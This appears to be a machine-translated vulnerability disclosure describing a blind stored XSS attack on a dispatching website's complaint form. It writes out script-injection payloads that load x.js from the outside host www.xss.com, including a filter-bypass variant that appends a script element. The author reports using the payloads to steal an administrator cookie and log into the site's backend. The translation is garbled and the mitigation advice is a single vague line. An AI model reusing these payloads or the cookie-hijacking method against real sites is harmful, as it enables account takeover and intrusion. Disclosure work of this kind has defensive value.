I haven't played XSS for a long time. In the vulnerability reply, the dispatch Administrator said that many of my friends are scanning their websites. (It seems that this is not good. Can you get a test, do not scan other servers). After seeing the popularity of the dispatching generation, you can manually detect it.
It seems that XSS has been filtered out by the Dispatching Network, but the filtering is not strict and can be bypassed. As a result, XSS is successfully moved to the background !!!
In the complaint, the xss code was written directly to the dummies for blind access:
> <Script src = http://www.xss.com/x.js> </script>
But after a day, I did not respond, so I tried again:
">
Comment '); document. body. appendChild (s); s. src = 'HTTP: // www.xss.com/x.js'; ">
Soon I received an email. I was excited to open the xss platform and saw the cookie.
Then you can log on to the system using the cookie:
Haha, it looks like the background is rich in content.
However, the background is very complicated, and you are afraid of problems. Thank you!
Proof of vulnerability:
Detailed description
Solution:
To filter XSS, We need to filter completely.